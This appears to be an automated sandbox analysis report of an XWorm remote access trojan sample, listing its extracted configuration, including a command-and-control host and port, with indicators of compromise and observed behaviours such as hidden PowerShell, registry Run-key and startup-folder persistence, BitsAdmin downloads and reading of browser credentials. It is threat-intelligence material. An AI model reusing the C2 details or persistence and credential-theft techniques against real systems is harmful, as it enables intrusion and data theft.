xworm | hxxps://gofile[.]io/d/TLyqC3

Analysis

max time kernel
300s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
09-06-2024 09:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/TLyqC3

Score

10^/10

xworm execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:44454

Name1442-44454.portmap.host:44454

Attributes

Install_directory
%Temp%
install_file
LX.exe

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\LXDeveloper.exe	family_xworm
behavioral1/memory/2136-404-0x0000000000D10000-0x0000000000D4E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

22 2236 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4736 powershell.exe
3108 powershell.exe
2236 powershell.exe
4820 powershell.exe
5532 powershell.exe
5836 powershell.exe
5260 powershell.exe

flow	pid	process
22	2236	powershell.exe

pid	process
4736	powershell.exe
3108	powershell.exe
2236	powershell.exe
4820	powershell.exe
5532	powershell.exe
5836	powershell.exe
5260	powershell.exe

Drops startup file 2 IoCs

Processes:

LXDeveloper.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LX.lnk	LXDeveloper.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LX.lnk	LXDeveloper.exe

Executes dropped EXE 5 IoCs

Processes:

LXDeveloper.exeLX.exeLX.exeLX.exeLX.exe

pid process

2136 LXDeveloper.exe
5580 LX.exe
5608 LX.exe
3020 LX.exe
5432 LX.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2136	LXDeveloper.exe
5580	LX.exe
5608	LX.exe
3020	LX.exe
5432	LX.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

LXDeveloper.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\LX = "C:\\Users\\Admin\\AppData\\Local\\Temp\\LX.exe"	LXDeveloper.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

21 ip-api.com

flow	ioc
21	ip-api.com

Drops file in System32 directory 15 IoCs

Processes:

svchost.exesvchost.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\LX	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe

Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

5156 schtasks.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

1636 bitsadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	svchost.exe

pid	process
5156	schtasks.exe

pid	process
1636	bitsadmin.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exechrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe

Modifies data under HKEY_USERS 6 IoCs

Processes:

chrome.exesvchost.exesvchost.exechrome.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133623997429387489"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 41 IoCs

Processes:

explorer.exepowershell.exepowershell.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Rev = "0"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616209"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	explorer.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

LXDeveloper.exeexplorer.exe

pid process

2136 LXDeveloper.exe
5352 explorer.exe

pid	process
2136	LXDeveloper.exe
5352	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exepowershell.exepowershell.exepowershell.exe

pid	process
3508	chrome.exe
3508	chrome.exe
4736	powershell.exe
4736	powershell.exe
4736	powershell.exe
4736	powershell.exe
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe
2236	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3456 Explorer.EXE

pid	process
3456	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

Processes:

chrome.exechrome.exechrome.exe

pid	process
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
860	chrome.exe
860	chrome.exe
860	chrome.exe
860	chrome.exe
860	chrome.exe
5648	chrome.exe
5648	chrome.exe
5648	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe
Token: SeShutdownPrivilege	3508	chrome.exe
Token: SeCreatePagefilePrivilege	3508	chrome.exe

Suspicious use of FindShellTrayWindow 41 IoCs

Processes:

chrome.exechrome.exechrome.exe

pid	process
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
860	chrome.exe
860	chrome.exe
860	chrome.exe
5648	chrome.exe
5648	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe
3508	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

LXDeveloper.exeexplorer.exe

pid process

2136 LXDeveloper.exe
5352 explorer.exe
5352 explorer.exe

pid	process
2136	LXDeveloper.exe
5352	explorer.exe
5352	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 3508 wrote to memory of 3524	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 3524	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2808	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 920	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 920	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
